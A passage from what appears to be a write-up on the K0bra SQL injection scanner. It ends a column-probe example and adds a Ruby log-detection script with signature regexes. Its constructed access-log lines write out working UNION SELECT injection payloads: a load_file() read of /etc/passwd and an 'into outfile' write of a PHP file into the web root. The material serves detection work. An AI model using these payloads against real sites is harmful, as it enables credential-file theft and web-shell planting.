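
if __FILE__ == $0
  p find_reflected_column(->(v) { fake_vulnerable_page(v) })   # [3, 2]
end
```

Against the stand-in, the probe succeeds at three columns and reports column 2 as the one that reaches the page; that pair is exactly what the script turns into the "hackman" placeholder URL it uses for every later query.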
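Added example for the other side of the fence, not from the original post: spotting this scanner's traffic in a web server access log. The script hard-codes its sentinels into every request (the hex of "K0BRA", 0x4b30425241, around each extracted value; char(69,82,84,79,82,56,53,52), i.e. "ERTOR854", around load_file() output; the unhex(hex(concat( wrapper; information_schema and mysql.user lookups; into outfile), and those constants survive the "+", "%20" and "/**/" bypass styles once the query is normalised. The log lines, the signature names and the function names below are constructed for this example.

```ruby
# Added example (not K0bra's own code): detection of the scanner's fixed
# payload constants in combined-format access logs.
require "cgi"

K0BRA_SIGNATURES = {
  marker_hex:      /0x4b30425241/i,                      # hex("K0BRA")
  loadfile_marker: /char\(69,82,84,79,82,56,53,52\)/i,   # "ERTOR854"
  unhex_wrapper:   /unhex\(hex\(concat\(/i,
  schema_enum:     /information_schema\.(tables|columns|schemata)/i,
  mysql_user:      /mysql\.user/i,
  into_outfile:    /into\s+outfile/i
}.freeze

# Minimal combined-log parser: client IP, timestamp, request path, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) \S+" (?<status>\d{3})/

def parse_log_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[:ip], ts: m[:ts], path: m[:path], status: m[:status].to_i }
end

# See the request the way the database would: URL-decode ("+" and "%20"
# become spaces) and turn the "/**/" comment separator into a space.
def normalise_query(path)
  CGI.unescape(path).gsub("/**/", " ")
end

def match_signatures(query)
  K0BRA_SIGNATURES.select { |_, re| query =~ re }.keys
end

# Returns one hash per log line that matches at least one signature.
def detect_k0bra(lines)
  lines.map do |line|
    rec = parse_log_line(line)
    next nil unless rec
    hits = match_signatures(normalise_query(rec[:path]))
    hits.empty? ? nil : rec.merge(signatures: hits)
  end.compact
end

# Constructed sample: table count probe, load_file() of /etc/passwd, a benign
# request, and an "into outfile" attempt using the /**/ bypass style.
SAMPLE_LOG = [
  '10.0.0.5 - - [24/Jul/2015:18:12:01 -0300] "GET /news.php?id=1+and+1=0+union+select+1,unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241))),3+from+information_schema.tables-- HTTP/1.1" 200 5123',
  '10.0.0.5 - - [24/Jul/2015:18:12:02 -0300] "GET /news.php?id=1+and+1=0+union+select+1,unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764),char(69,82,84,79,82,56,53,52)))),3-- HTTP/1.1" 200 7010',
  '192.0.2.9 - - [24/Jul/2015:18:13:10 -0300] "GET /news.php?id=42 HTTP/1.1" 200 4410',
  '10.0.0.5 - - [24/Jul/2015:18:14:30 -0300] "GET /news.php?id=1/**/and/**/1=0/**/union/**/select/**/1,0x3c3f706870,3/**/into/**/outfile/**/\'/var/www/cmd.php\'/**/ HTTP/1.1" 500 310'
].freeze

if __FILE__ == $0
  detect_k0bra(SAMPLE_LOG).each do |h|
    puts "#{h[:ts]} #{h[:ip]} #{h[:status]} #{h[:signatures].join(',')}"
  end
end
```

Matching on the tool's sentinels is cheap and precise, but it is a signature for this script and its copies, not for SQL injection in general; the generic patterns (information_schema, into outfile) are the ones worth keeping in a broader rule set.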